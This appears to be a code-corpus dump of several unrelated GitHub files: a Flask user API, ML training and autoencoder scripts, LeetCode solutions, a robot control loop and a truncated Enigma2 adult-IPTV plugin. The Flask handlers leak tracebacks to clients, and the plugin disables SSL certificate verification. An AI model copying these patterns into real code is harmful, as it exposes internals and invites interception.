                        'refresh_token':refresh_token,
                        'message':'Login Successful'
                        })
        return make_response(resp,200)
    except:
        # NOTE(review): returning the raw traceback leaks internals to clients.
        return make_response(str(traceback.format_exc()),500)
# get all system users
@auth_bp.route('/user/get_users', methods=['GET'])
@jwt_required()
def get_all_users():
    """Return one page of users (newest first) together with pagination metadata."""
    try:
        per_page = current_app.config['NUM_OF_ITEMS_PER_PAGE']
        page = request.args.get('page', 1, type=int)
        paginated = User.query.order_by(User.user_id.desc()).paginate(page, per_page, False)
        pagination_info = {
            'next_page': paginated.next_num,
            'prev_page': paginated.prev_num,
            'current_page': paginated.page,
            'no_of_pages': paginated.pages,
            'items_per_page': paginated.per_page,
            'total_items': paginated.total,
        }
        users = [record.serialise() for record in paginated.items]
        return make_response(jsonify({"data": users, "info": pagination_info}), 200)
    except:
        return make_response(str(traceback.format_exc()),500)
# get user by id
@auth_bp.route('/user/get_user/<int:user_id>', methods=['GET'])
@jwt_required()
def get_user(user_id):
    """Return a single user by primary key, or 404 if no such user exists."""
    try:
        user = User.query.get(user_id)
        # Bug fix: a missing user previously caused user.serialise() to raise
        # AttributeError on None, producing a 500 with a leaked traceback.
        if user is None:
            return make_response(jsonify({'message': 'User not found!'}), 404)
        return make_response(jsonify(user.serialise()),200)
    except:
        return make_response(str(traceback.format_exc()),500)
| conradsuuna/uac-computer-competency | app/controllers/users.py | users.py | py | 4,056 | python | en | code | 0 | github-code | 36 |
72766865064 | import numpy as np
import random
import csv
class traintest:
    """Split per-character LIWC feature files into shuffled train/test sets.

    Reads one CSV per character from ../intermediate/, labels each row with
    the character name, shuffles, and writes per-character training files
    plus a combined test file under friends/.
    """
    def __init__(self,cnames,instx=0):
        # cnames: list of character names; instx: number of (shuffled) rows
        # per character that are held out for the test split.
        self.train=[]
        self.test=[]
        self.cnames=cnames
        self.ofiles=[]
        for j in range(len(self.cnames)):
            tfname='friends/train_'+self.cnames[j].lower()+'.txt'
            pf=open(tfname,'w')
            self.ofiles.append(pf)
        self.instx=instx
        self.train_ofile=open('friends/training.txt','w')
        self.test_ofile=open('friends/testing.txt','w')
        csvfile1=open('chandler_rest.csv', 'w',newline='')
        self.csvfile=csv.writer(csvfile1,delimiter=',')
    def prinitit(self,separate=True):
        """Write collected rows: one CSV (separate=False) or one file per
        character plus the combined test file (separate=True)."""
        if separate==False:
            for j in range(len(self.train)):
                self.csvfile.writerow(self.train[j])
        else:
            for j in range(len(self.train)):
                spx=self.train[j]
                character=spx[-1]  # last field is the character label
                toprint=",".join(spx[:-1])
                indxxx=self.cnames.index(character)
                self.ofiles[indxxx].write(str(j+1)+','+toprint+'\n')
            for k in range(len(self.test)):
                topprint=",".join(self.test[k])
                self.test_ofile.write(str(k+1)+','+topprint+'\n')
    def processfiles(self):
        """Read each character's LIWC CSV, label and split the rows, then
        shuffle both splits and write them out via prinitit()."""
        for j in range(len(self.cnames)):
            el=self.cnames[j]
            fname='../intermediate/liwc_'+el.lower()+'.csv'
            # Bug fix: input files were opened and never closed (resource leak);
            # also removed dead locals (arrx, q2, an unused labels path string)
            # and a leftover debug print.
            with open(fname,'r',encoding='utf8') as filex:
                flines=filex.readlines()
            flines=flines[1:]  # drop the CSV header row
            random.shuffle(flines)
            for k in range(len(flines)):
                thisline=flines[k]
                q1=thisline[:-1]  # strip the trailing newline
                toadd=q1.split(",")
                toadd.append(el.strip())  # append the character label
                # first instx shuffled rows go to the test split, rest to train
                if k<self.instx:
                    self.test.append(toadd)
                else:
                    self.train.append(toadd)
        random.shuffle(self.train)
        random.shuffle(self.test)
        print("Training:",len(self.train))
        print("Testing:",len(self.test))
        self.prinitit()
# Run the split for the six main Friends characters; alternative casts for
# other shows are kept below as commented presets.
listx=['Chandler','Joey','Rachel','Ross','Monica','Phoebe']
#listx=['Sheldon','Penny','Leonard',]
#listx=['Sheldon','Penny','Bernadette','Amy','Raj','Leonard']
tt = traintest(listx)
tt.processfiles()
| arnab64/slugbot | feature_extraction/train_test/9_separate_train_test.py | 9_separate_train_test.py | py | 2,759 | python | en | code | 1 | github-code | 36 |
35578454600 | class cookie:
pass
# Two instances of the empty cookie class defined above; both report the
# same class in type() but are distinct objects.
a = cookie()
b = cookie()
print(type(a))
print(type(b))
class FourCal:
    """Simple two-operand calculator used by the demo code below."""

    def __init__(self, first=0, second=0):
        # Robustness fix: previously the operand defaults were commented out,
        # so calling add() before setdata() raised AttributeError. Defaulting
        # both operands to 0 keeps FourCal() backward compatible.
        self.first = first
        self.second = second

    def setdata(self, first, second):
        """Store the two operands used by the arithmetic methods."""
        self.first = first
        self.second = second

    def add(self):
        """Return the sum of the stored operands."""
        return self.first + self.second
# Demo: set operands directly on one instance, via setdata() on another, and
# show that the two instances (and their attribute objects) have their own ids.
c = FourCal()
c.first = 10
c.second = 20
print(c.first)
print(c.second)
d = FourCal()
d.setdata(3,4)
print(id(c))
print(id(d))
print(id(c.first))
print(id(d.first))
sumresult = c.add()
print(sumresult) | kamkm01/20190615python | python_basic/class_test.py | class_test.py | py | 508 | python | en | code | 0 | github-code | 36 |
3458614577 | class Solution(object):
def largeGroupPositions(self, s):
"""
:type s: str
:rtype: List[List[int]]
"""
res = []
stack = []
for index, ele in enumerate(s):
if not stack: #stack is empty
stack.append(ele)
else:
if stack[-1] == ele:
stack.append(ele)
else:
if len(stack) >= 3:
res.append([index - len(stack), index - 1])
stack = []
stack.append(ele)
if len(stack) >= 3:
res.append([index - len(stack)+1, index])
return res
class Solution(object):
    """Second variant: track the characters of the current run explicitly
    (the original used a small inner Stack helper, inlined here)."""

    def largeGroupPositions(self, s):
        result = []
        current = []  # characters of the run currently being scanned
        for idx, ch in enumerate(s):
            if current and current[-1] != ch:
                current = []  # a different character starts a new run
            current.append(ch)
            size = len(current)
            if size == 3:
                # the run just became "large": record its interval
                result.append([idx - size + 1, idx])
            elif size > 3:
                # the run grew further: extend the last recorded interval
                result[-1] = [idx - size + 1, idx]
        return result
class Solution:
    """Third variant: count run lengths, closing a run when the next
    character differs or the string ends."""

    def largeGroupPositions(self, s):
        intervals = []
        length = len(s)
        run = 1
        for idx in range(length):
            at_end = (idx == length - 1)
            if at_end or s[idx] != s[idx + 1]:
                if run >= 3:
                    intervals.append([idx - run + 1, idx])
                run = 1
            else:
                run += 1
        return intervals
if __name__ == '__main__':
    # NOTE: the first assignment is dead -- it is immediately overwritten by
    # the second one below; the commented values are alternative test cases.
    s = "abbxxxxzzy"
    # s = "aaa"
    # s = "aeeeeeeaabbbcd"
    s = "abcdddeeeeaabbbcd"
print(Solution().largeGroupPositions(s)) | pi408637535/Algorithm | com/study/algorithm/daily/830. Positions of Large Groups.py | 830. Positions of Large Groups.py | py | 2,159 | python | en | code | 1 | github-code | 36 |
31113872518 | """
The main script that serves as the entry-point for all kinds of training experiments.
"""
from __future__ import annotations
import logging
from functools import partial
from typing import TYPE_CHECKING, Any, Callable, Mapping, Optional, Sequence, Tuple, Union
import torch
from al.core.data.collators import JointBatchToTensorDataCollator
from al.core.models.vaal.xai_model import VAALXAIModel
from al.core.training.query_strategies.factory import QueryStrategyFactory
from al.core.training.trainer import DALTrainer
from ignite.contrib.handlers import TensorboardLogger
from torch import nn
from xai_torch.core.args import Arguments
from xai_torch.core.constants import DataKeys
from xai_torch.core.models.utilities.data_collators import BatchToTensorDataCollator
from xai_torch.core.models.xai_model import XAIModel
from xai_torch.core.training.utilities import reset_random_seeds
if TYPE_CHECKING:
from al.core.training.query_strategies.base import QueryStrategy
from xai_torch.core.args import Arguments
from xai_torch.core.data.data_modules.base import BaseDataModule
from al.core.data.active_learning_datamodule import ActiveLearningDataModule
from ignite.engine import Engine
from xai_torch.core.training.constants import TrainingStage
logging.basicConfig(level=logging.INFO)
class VAALTrainer(DALTrainer):
    @classmethod
    def configure_running_avg_logging(cls, args: Arguments, engine: Engine, stage: TrainingStage):
        """Attach running-average metrics for the task, VAE and discriminator
        losses to *engine*, logged under the "<stage>/<step>_loss" names."""
        from ignite.metrics import RunningAverage
        def output_transform(x: Any, index: int, name: str) -> Any:
            # Pull one loss out of the engine's step output, whatever its
            # container type (mapping by name, sequence by index, or a bare
            # tensor/number passed through unchanged).
            import numbers
            import torch
            if isinstance(x, Mapping):
                return x[name]
            elif isinstance(x, Sequence):
                return x[index]
            elif isinstance(x, (torch.Tensor, numbers.Number)):
                return x
            else:
                raise TypeError(
                    "Unhandled type of update_function's output. "
                    f"It should either mapping or sequence, but given {type(x)}"
                )
        # add loss as a running average metric (one per VAAL training step)
        for i, n in enumerate([f"{step}_{DataKeys.LOSS}" for step in ["task", "vae", "dsc"]]):
            RunningAverage(
                alpha=0.5, output_transform=partial(output_transform, index=i, name=n), epoch_bound=False
            ).attach(engine, f"{stage}/{n}")
    @classmethod
    def setup_training_engine(cls, args, model, train_dataloader, val_dataloader, output_dir, tb_logger, device):
        """Create and wire up the training (and optional validation) engines.

        Returns a (training_engine, validation_engine) pair; the validation
        engine is None unless args.general_args.do_val is set.
        """
        # setup training engine
        training_engine = cls.initialize_training_engine(
            args=args, model=model, train_dataloader=train_dataloader, device=device
        )
        validation_engine = None
        if args.general_args.do_val:
            # setup validation engine
            validation_engine = cls.initialize_validation_engine(args=args, model=model, device=device)
        # configure training and validation engines (checkpointing, logging, schedulers)
        cls.configure_training_engine(
            args=args,
            training_engine=training_engine,
            model=model,
            output_dir=output_dir,
            tb_logger=tb_logger,
            train_dataloader=train_dataloader,
            validation_engine=validation_engine,
            val_dataloader=val_dataloader,
        )
        # add training hooks from the model
        model.add_training_hooks(training_engine)
        return training_engine, validation_engine
@classmethod
def initialize_training_engine(
cls,
args: Arguments,
model: VAALXAIModel,
train_dataloader: DataLoader,
device: Optional[Union[str, torch.device]] = torch.device("cpu"),
scaler: Optional["torch.cuda.amp.GradScaler"] = None,
) -> Callable:
def cycle(iterable):
while True:
for i in iterable:
yield i
if args.training_args.gradient_accumulation_steps <= 0:
raise ValueError(
"Gradient_accumulation_steps must be strictly positive. "
"No gradient accumulation if the value set to one (default)."
)
from ignite.engine import Engine
# get related arguments
gradient_accumulation_steps = args.training_args.gradient_accumulation_steps
non_blocking = args.training_args.non_blocking_tensor_conv
train_datacycler = cycle(train_dataloader)
def update_model(engine, model, batch, step="task"):
from xai_torch.core.constants import DataKeys
# perform optimizers zero_grad() operation with gradient accumulation
if (engine.state.iteration - 1) % gradient_accumulation_steps == 0:
print(step, "zero grad")
model.optimizers[step].zero_grad()
# forward pass
model_output = model.torch_model.training_step(batch=batch, step=step)
# make sure we get a dict from the model
assert isinstance(model_output, dict), "Model must return an instance of dict."
# get loss from the output dict
loss = model_output[DataKeys.LOSS]
# accumulate loss if required
if gradient_accumulation_steps > 1:
loss = loss / gradient_accumulation_steps
# backward pass
loss.backward()
print(step, loss)
# perform optimizer update for correct gradient accumulation step
if engine.state.iteration % gradient_accumulation_steps == 0:
model.optimizers[step].step()
print(step, "step update")
# if on the go training evaluation is required, detach data from the graph
if args.training_args.eval_training and step == "task":
return_dict = {}
for key, value in model_output.items():
if key == DataKeys.LOSS:
return_dict[key] = value.item()
elif isinstance(value, torch.Tensor):
return_dict[key] = value.detach()
return return_dict
return {f"{step}_{DataKeys.LOSS}": model_output[DataKeys.LOSS].item()}
def training_step(engine: Engine, _) -> Union[Any, Tuple[torch.Tensor]]:
"""
Define the model training update step
"""
from ignite.utils import convert_tensor
# setup model for training
model.torch_model.train()
# get batch from dataloader
batch = next(train_datacycler)
# put batch to device
batch = convert_tensor(batch, device=device, non_blocking=non_blocking)
# call task model update
task_output = update_model(engine, model, batch, step="task")
# call the vae update
for count in range(args.al_args.training_args.num_vae_steps):
vae_output = update_model(engine, model, batch, step="vae")
# sample new batch if needed to train the adversarial network
if count < (args.al_args.training_args.num_vae_steps - 1):
batch = next(train_datacycler)
batch = convert_tensor(batch, device=device, non_blocking=non_blocking)
# call the dsc update
for count in range(args.al_args.training_args.num_adv_steps):
dsc_output = update_model(engine, model, batch, step="dsc")
# sample new batch if needed to train the adversarial network
if count < (args.al_args.training_args.num_adv_steps - 1):
batch = next(train_datacycler)
batch = convert_tensor(batch, device=device, non_blocking=non_blocking)
return {**task_output, **vae_output, **dsc_output}
return Engine(training_step)
@classmethod
def setup_model(
cls,
args: Arguments,
datamodule: BaseDataModule,
tb_logger: TensorboardLogger,
summarize: bool = False,
stage: TrainingStage = TrainingStage.train,
) -> XAIModel:
"""
Initializes the model for training.
"""
from xai_torch.core.models.factory import ModelFactory
# setup model
model = ModelFactory.create(args, datamodule, tb_logger=tb_logger, wrapper_class=VAALXAIModel)
model.setup(stage=stage)
# generate model summary
if summarize:
model.summarize()
return model
    @classmethod
    def train(cls, local_rank, args: Arguments):
        """
        Initializes the training of a model given dataset, and their configurations.

        Runs the full active-learning loop: for each round, (re)trains the
        model on the current labelled pool, tests it, queries new samples to
        label, and persists the round state so the loop can be resumed.
        """
        import ignite.distributed as idist
        from xai_torch.core.training.utilities import initialize_training, setup_logging
        from xai_torch.utilities.logging_utils import DEFAULT_LOGGER_NAME, setup_logger
        # setup logging
        logger = setup_logger(DEFAULT_LOGGER_NAME, distributed_rank=local_rank, level=logging.INFO)
        # initialize training
        initialize_training(args)
        # initialize torch device (cpu or gpu)
        device = idist.device()
        # get device rank
        rank = idist.get_rank()
        # initialize logging directory and tensorboard logger
        output_dir, tb_logger = setup_logging(args)
        # setup datamodule
        datamodule: ActiveLearningDataModule = cls.setup_datamodule(args, rank=rank, stage=None)
        # setup model
        model = cls.setup_model(args, datamodule, tb_logger, summarize=True)
        # define active learning query strategy
        query_strategy: QueryStrategy = QueryStrategyFactory.create(
            datamodule=datamodule, model=model, device=device, args=args.al_args
        )
        # load active learning state (resumes from a previous run if present)
        al_state = DALTrainer.load_round_state(0, datamodule, output_dir=output_dir)
        curr_round = al_state["curr_round"]
        if curr_round == args.al_args.n_rounds:
            logger.warning(
                "Active learning rounds have already been finished! Either increase the number of "
                f"max rounds (current={args.al_args.n_rounds}) "
                "OR reset the training from start."
            )
            exit()
        # reset seeds for training. This allows multiple experiments with same seed for dataset initialization but
        # different seeds for the active learning training process.
        reset_random_seeds(args.al_args.al_seed)
        while curr_round < args.al_args.n_rounds:
            from al.core.training.query_strategies.impl.ceal import CEAL
            logger.info(f"============== Running round={curr_round} of active learning ===========")
            # update tblogger dir (one tensorboard directory per round)
            # NOTE(review): tb_logger stays None on non-zero ranks, yet
            # perform_query() below dereferences tb_logger.writer -- looks like
            # this would fail when run distributed; confirm intended usage.
            tb_logger = None
            if rank == 0:
                from ignite.contrib.handlers import TensorboardLogger
                tb_logger = TensorboardLogger(output_dir / str(curr_round))
            # print labels summary
            datamodule.print_label_summary()
            # Reset model for re-training
            if args.al_args.reset_model:
                model = cls.setup_model(args, datamodule, tb_logger, summarize=False)
            else:
                # Reset only optimizers and schedulers
                model._opt_sch_handler.setup_opt_sch()
            # get train dataloader for labelled data
            joint_dataloader = datamodule.get_joint_dataset_loader(
                collate_fn=JointBatchToTensorDataCollator(datamodule._collate_fns.train)
            )
            # get validation data loader
            val_dataloader = datamodule.val_dataloader()
            # setup training engine
            training_engine, _ = cls.setup_training_engine(
                args=args,
                model=model,
                train_dataloader=joint_dataloader,
                val_dataloader=val_dataloader,
                output_dir=output_dir / str(curr_round),  # append round number to output_dir
                tb_logger=tb_logger,
                device=device,
            )
            training_engine.logger = logger
            resume_epoch = training_engine.state.epoch
            if not (training_engine._is_done(training_engine.state) or resume_epoch >= args.training_args.max_epochs):
                # run training
                training_engine.run(range(len(joint_dataloader)), max_epochs=args.training_args.max_epochs)
                # training_engine.run(labeled_dataloader, max_epochs=args.training_args.max_epochs)
                # after the training, the test engine automatically loads the 'best' model to continue the rounds.
                test_dataloader = datamodule.test_dataloader()
                # run testing after the end of every round
                test_engine = cls.setup_test_engine(
                    args=args,
                    model=model,
                    test_dataloader=test_dataloader,
                    output_dir=output_dir / str(curr_round),
                    tb_logger=tb_logger,
                    device=device,
                )
                test_engine.logger = logger
                test_engine.run(test_dataloader)
            else:
                # if we are resuming from last checkpoint and training is already finished
                logger.info(
                    "Training has already been finished! Either increase the number of "
                    f"epochs (current={args.training_args.max_epochs}) >= {resume_epoch} "
                    "OR reset the training from start."
                )
                # after the training, the test engine automatically loads the 'best' model to continue the rounds.
                test_dataloader = datamodule.test_dataloader()
                # don't run test but just set it up so that model has latest correct checkpoint loaded
                test_engine = cls.setup_test_engine(
                    args=args,
                    model=model,
                    test_dataloader=test_dataloader,
                    output_dir=output_dir / str(curr_round),
                    tb_logger=tb_logger,
                    device=device,
                )
            # NOTE: The test engine has already updated the model state with state of last/best
            # checkpoint which will be used for querying of the next round.
            def perform_query():
                # Select the next batch of pool samples to label, timing the query.
                import timeit
                # reset the querying strategy
                query_strategy.reset(model)
                # update the labeled pool
                start = timeit.default_timer()
                n_query_samples = int(args.al_args.n_query_ratio * datamodule.pool_size)
                if isinstance(query_strategy, CEAL):
                    query_indices = query_strategy.query(n_samples=n_query_samples, round=curr_round)
                else:
                    query_indices = query_strategy.query(n_samples=n_query_samples)
                stop = timeit.default_timer()
                tb_logger.writer.add_scalar("query_time", stop - start, curr_round)
                datamodule.update_dataset_labels(query_indices)
            # perform query
            perform_query()
            # save active learning query state for next round
            DALTrainer.save_round_state(curr_round + 1, datamodule, output_dir=output_dir)
            if rank == 0:
                # close tb logger
                tb_logger.close()
            curr_round += 1
| saifullah3396/doc_al | src/al/core/training/vaal_trainer.py | vaal_trainer.py | py | 15,573 | python | en | code | 0 | github-code | 36 |
6215124822 | from rodi import RoDI
import time
robot = RoDI()
def reubicar():
    """Recovery maneuver: stop, back off the detected line, turn left and
    drive forward to re-enter the arena. Command order is significant."""
    robot.move_stop()
    robot.pixel(20,0,0)  # red LED signals that recovery is in progress
    robot.move_backward()
    time.sleep(0.1)
    robot.move_left()
    time.sleep(0.5)
    robot.move_forward()
    time.sleep(0.5)
def ataque():
    """Attack move: drive both motors forward at full speed."""
    robot.move(100,100)
# Bug fix: inicio_de_ataque was previously reset to None on EVERY iteration and
# then used unguarded in `time.time() - inicio_de_ataque`, which raised
# TypeError (None minus float) whenever no attack started that same iteration.
# It is now initialised once before the loop and the timeout check is guarded.
inicio_de_ataque = None  # timestamp of the last attack start; None while idle
while True:
    try:
        distancia = robot.see()
        linea = robot.sense()
        robot.pixel(20,20,20)
        robot.move(30,30)
        time.sleep(0.1)
        print("Distancia: " + str(distancia))
        print("Linea 1: " + str(linea[0]))
        print("Linea 2: " + str(linea[1]))
        # A bright line reading means we are at the arena edge: recover.
        if (linea[0] >= 100 or linea[1] >= 100):
            reubicar()
        # An obstacle closer than 15 cm triggers (or restarts) an attack.
        if distancia < 15:
            ataque()
            inicio_de_ataque = time.time()
        # Abort an attack that has been running for more than 2 seconds.
        if inicio_de_ataque is not None and time.time() - inicio_de_ataque > 2:
            reubicar()
            inicio_de_ataque = None
    except KeyboardInterrupt:
        robot.move_stop()
        break
| devpbeat/bootcamp | rob.py | rob.py | py | 921 | python | es | code | 0 | github-code | 36 |
14007726581 | import torch
import torch.nn as nn
import os
from torchvision import datasets, transforms
from torch.utils.data import DataLoader, Dataset
import wandb
from PIL import Image
import numpy as np
from tqdm import tqdm
from torch.optim.lr_scheduler import ExponentialLR
class Encoder(nn.Module):
    """Convolutional encoder: (N, 3, 200, 200) image -> (N, encoded_space_dim) latent."""

    def __init__(self, encoded_space_dim):
        super().__init__()
        # Four strided 9x9 convolutions downsample 200x200 -> 8x8 while
        # widening channels 3 -> 8 -> 16 -> 32 -> 64.
        conv_stack = [
            nn.Conv2d(in_channels=3, out_channels=8, kernel_size=9, stride=2, padding=2),
            nn.ReLU(True),
            nn.Conv2d(in_channels=8, out_channels=16, kernel_size=9, stride=2, padding=2),
            nn.BatchNorm2d(16),
            nn.ReLU(True),
            nn.Conv2d(in_channels=16, out_channels=32, kernel_size=9, stride=2, padding=2),
            nn.BatchNorm2d(32),
            nn.ReLU(True),
            nn.Conv2d(in_channels=32, out_channels=64, kernel_size=9, stride=2, padding=1),
            nn.ReLU(True),
        ]
        self.encoder_cnn = nn.Sequential(*conv_stack)
        # Collapse the (64, 8, 8) feature map into one flat vector per sample.
        self.flatten = nn.Flatten(start_dim=1)
        # Project the 4096-dim flattened features down to the latent size.
        self.encoder_lin = nn.Sequential(
            nn.Linear(8 * 8 * 64, encoded_space_dim),
            nn.ReLU(True),
        )

    def forward(self, x):
        features = self.encoder_cnn(x)
        flat = self.flatten(features)
        return self.encoder_lin(flat)
class Decoder(nn.Module):
    """Mirror of Encoder: maps a latent vector back to a (N, 3, 200, 200) image.

    forward() returns a pair (pre, post): the raw transposed-convolution
    reconstruction and a residually refined version of it.
    """

    def __init__(self, encoded_space_dim):
        super().__init__()
        # Latent vector -> flat feature vector matching the encoder's output size.
        self.decoder_lin = nn.Sequential(
            nn.Linear(encoded_space_dim, 8 * 8 * 64),
            nn.ReLU(True)
        )
        # Reshape the flat vector back into a (64, 8, 8) feature map.
        self.unflatten = nn.Unflatten(dim=1, unflattened_size=(64, 8, 8))
        # Four strided 9x9 transposed convolutions upsample 8x8 -> 200x200
        # while narrowing channels 64 -> 32 -> 16 -> 8 -> 3.
        upsample_stack = [
            nn.ConvTranspose2d(in_channels=64, out_channels=32, kernel_size=9, stride=2, padding=1, output_padding=1,),
            nn.BatchNorm2d(32),
            nn.ReLU(True),
            nn.ConvTranspose2d(in_channels=32, out_channels=16, kernel_size=9, stride=2, padding=2, output_padding=1),
            nn.BatchNorm2d(16),
            nn.ReLU(True),
            nn.ConvTranspose2d(in_channels=16, out_channels=8, kernel_size=9, stride=2, padding=3, output_padding=1),
            nn.BatchNorm2d(8),
            nn.ReLU(True),
            nn.ConvTranspose2d(in_channels=8, out_channels=3, kernel_size=9, stride=2, padding=2, output_padding=1),
        ]
        self.decoder_conv = nn.Sequential(*upsample_stack)
        # Small refinement head applied on top of the sigmoid reconstruction.
        self.post_net = nn.Sequential(
            nn.Conv2d(in_channels=3, out_channels=16, kernel_size=5, padding=2),
            nn.BatchNorm2d(16),
            nn.ReLU(True),
            nn.Conv2d(in_channels=16, out_channels=8, kernel_size=5, padding=2),
            nn.BatchNorm2d(8),
            nn.ReLU(True),
            nn.Conv2d(in_channels=8, out_channels=3, kernel_size=5, padding=2),
        )

    def forward(self, z):
        feat = self.decoder_lin(z)
        feat = self.unflatten(feat)
        recon = torch.sigmoid(self.decoder_conv(feat))
        refined = torch.sigmoid(recon + self.post_net(recon))
        return recon, refined
def train(encoder, decoder, train_loader, device = 'cpu', logger = None):
    """Jointly train encoder/decoder with an MSE reconstruction loss for 100 epochs.

    logger is expected to expose a wandb-style .log(); one input/output image
    pair is logged on every step, and the LR decays exponentially per epoch.
    """
    optimizer = torch.optim.Adam(list(encoder.parameters()) + list(decoder.parameters()), lr=0.0001, weight_decay=1e-05)
    scheduler = ExponentialLR(optimizer, gamma=0.9)
    loss_func = nn.MSELoss()
    encoder.to(device).train()
    decoder.to(device).train()
    for epoch in range(100):
        for step, x in enumerate(train_loader):
            # Fix: torch.tensor(tensor) copy-construction is discouraged (PyTorch
            # warns about it); convert dtype/device with Tensor.to instead, then
            # scale uint8 pixels to [0, 1].
            x = x.to(device=device, dtype=torch.float32) / 255.0
            pre_out, post_out = decoder(encoder(x))
            # Weighted sum of the raw and refined reconstruction losses.
            loss = 0.8 * loss_func(pre_out, x) + loss_func(post_out, x)
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()
            logger.log({'Loss': loss.cpu().item()})
            # NOTE(review): the dataset stores images reshaped (not transposed)
            # to (3, 200, 200), so reshape(200, 200, 3) here round-trips back to
            # the original pixel layout for display -- confirm before changing
            # either side to a transpose/permute.
            input = wandb.Image(x[0].cpu().detach().numpy().reshape(200,200,3))
            output = wandb.Image(post_out[0].cpu().detach().numpy().reshape(200,200,3))
            logger.log({"Input": input,
                        "Output": output})
        scheduler.step()
class UTKFaceDataset(Dataset):
    """In-memory dataset of UTKFace images loaded from ``data/UTKFace/``.

    All images are read eagerly into a single uint8 tensor ``self.X`` of
    shape (N, 3, 200, 200) when ``data_type == "train"``.
    """
    def __init__(self, test_size = .2, data_type = "train"):
        """
        Create data loader for UTKFace dataset
        """
        self.data_dir = 'data/UTKFace/'
        self.all_files = os.listdir(self.data_dir)
        if data_type == "train":
            self.data = []
            for file in tqdm(self.all_files[:]):
                img = Image.open(self.data_dir + file)
                # NOTE(review): images decode as HWC (200,200,3);
                # reshape(3,200,200) reinterprets rather than transposes --
                # confirm a permute/transpose was not intended.
                self.data.append(np.asanyarray(img).reshape(3,200,200))
                img.close()
            self.X = torch.tensor(np.stack(self.data))
    def get_data(self):
        # NOTE(review): self.y is never assigned anywhere in this class, so
        # calling this raises AttributeError; appears to be leftover from a
        # supervised variant.
        return self.X.shape, self.y.shape
    def __len__(self):
        # number of images loaded
        return self.X.shape[0]
    def __getitem__(self, idx):
        # returns the raw uint8 image tensor; scaling happens in train()
        img = self.X[idx]
        return img
# Script entry point: loads a pre-trained 256-dim encoder/decoder pair onto
# CPU in eval mode and prints the dataset tensor shape. The commented-out
# lines are the original training/saving workflow, kept for reference.
if __name__ == '__main__':
    dim = 256
    # torch.manual_seed(1000)
    dataset = UTKFaceDataset()
    # train_loader = DataLoader(datasets, batch_size=32, shuffle=True)
    # logger = wandb.init(project="autoencoder", name=f"AE {dim} TEST", entity='petergroenning')
    encoder_weights = torch.load('models/encoder_256.pt', map_location=torch.device('cpu'))
    decoder_weights = torch.load('models/decoder_256.pt', map_location=torch.device('cpu'))
    encoder = Encoder(encoded_space_dim=dim)
    decoder = Decoder(encoded_space_dim=dim)
    encoder.load_state_dict(encoder_weights)
    decoder.load_state_dict(decoder_weights)
    encoder.eval()
    decoder.eval()
    print(dataset.X.shape)
    # decoder = Decoder(encoded_space_dim=dim, fc2_input_dim=512)
    # torch.manual_seed(1000)
    # train(encoder, decoder, train_loader, device = 'cuda', logger = logger)
    # torch.save(encoder.state_dict(), f"encoder_{dim}.pth")
    # torch.save(decoder.state_dict(), f"decoder{dim}.pth")
| s183920/02582_Computational_Data_Analysis_Case2 | autoencoder.py | autoencoder.py | py | 6,011 | python | en | code | 0 | github-code | 36 |
25127011115 | #!/usr/bin/python
# -*- coding: utf-8 -*-
'''
****************************************
* coded by Lululla & PCD *
* skin by MMark *
* 26/03/2023 *
* Skin by MMark *
****************************************
# --------------------#
# Info http://t.me/tivustream
'''
from __future__ import print_function
from Components.ActionMap import ActionMap
from Components.Label import Label
from Components.Pixmap import Pixmap
from Screens.Screen import Screen
from Tools.Directories import SCOPE_PLUGINS
from Tools.Directories import resolveFilename
from enigma import eTimer
import codecs
import os
import re
import six
import ssl
import sys
from Plugins.Extensions.xxxplugin.plugin import rvList, Playstream1
from Plugins.Extensions.xxxplugin.plugin import show_
from Plugins.Extensions.xxxplugin.lib import Utils
from Plugins.Extensions.xxxplugin import _, skin_path
PY3 = sys.version_info.major >= 3
print('Py3: ', PY3)
if sys.version_info >= (2, 7, 9):
try:
sslContext = ssl._create_unverified_context()
except:
sslContext = None
currversion = '1.0'
title_plug = 'freearhey '
desc_plugin = ('..:: freearhey by Lululla %s ::.. ' % currversion)
PLUGIN_PATH = resolveFilename(SCOPE_PLUGINS, "Extensions/{}".format('xxxplugin'))
current = os.path.dirname(os.path.realpath(__file__))
parent = os.path.dirname(current)
sys.path.append(parent)
print(current)
print(parent)
pluglogo = os.path.join(PLUGIN_PATH, 'pic/freearhey.png')
stripurl = 'aHR0cHM6Ly9pcHR2LW9yZy5naXRodWIuaW8vaXB0di9jYXRlZ29yaWVzL3h4eC5tM3U='
referer = 'https://github.com/iptv-org/iptv'
_session = None
Path_Movies = '/tmp/'
PY3 = sys.version_info.major >= 3
class main(Screen):
    """Main enigma2 screen: lists adult IPTV channels scraped from the
    iptv-org m3u playlist and plays the selected stream."""
    def __init__(self, session):
        self.session = session
        Screen.__init__(self, session)
        # load the XML skin definition shared with the parent plugin
        skin = os.path.join(skin_path, 'defaultListScreen.xml')
        with codecs.open(skin, "r", encoding="utf-8") as f:
            self.skin = f.read()
        self.menulist = []
        self['menulist'] = rvList([])
        self['red'] = Label(_('Back'))
        # self['green'] = Label(_('Export'))
        self['title'] = Label('')
        self['title'].setText(title_plug)
        self['name'] = Label('')
        self['text'] = Label('Only for Adult by Lululla')
        self['poster'] = Pixmap()
        self.currentList = 'menulist'
        self['actions'] = ActionMap(['OkCancelActions',
                                     'ColorActions',
                                     'DirectionActions',
                                     'MovieSelectionActions'], {'up': self.up,
                                                                'down': self.down,
                                                                'left': self.left,
                                                                'right': self.right,
                                                                'ok': self.ok,
                                                                'green': self.ok,
                                                                'cancel': self.exit,
                                                                'red': self.exit}, -1)
        # defer the (network-bound) list population until after the screen
        # is shown; DreamOS uses signal/slot timers, other images callbacks
        self.timer = eTimer()
        if Utils.DreamOS():
            self.timer_conn = self.timer.timeout.connect(self.updateMenuList)
        else:
            self.timer.callback.append(self.updateMenuList)
        self.timer.start(500, True)
    def up(self):
        # move selection up and refresh the name label
        self[self.currentList].up()
        auswahl = self['menulist'].getCurrent()[0][0]
        self['name'].setText(str(auswahl))
    def down(self):
        # move selection down and refresh the name label
        self[self.currentList].down()
        auswahl = self['menulist'].getCurrent()[0][0]
        self['name'].setText(str(auswahl))
    def left(self):
        # page up and refresh the name label
        self[self.currentList].pageUp()
        auswahl = self['menulist'].getCurrent()[0][0]
        self['name'].setText(str(auswahl))
    def right(self):
        # page down and refresh the name label
        self[self.currentList].pageDown()
        auswahl = self['menulist'].getCurrent()[0][0]
        self['name'].setText(str(auswahl))
    def updateMenuList(self):
        """Download the playlist, parse '#EXTINF ... title=..' entries and
        fill the channel list ("Country | Name" sorted alphabetically)."""
        self.cat_list = []
        for x in self.cat_list:
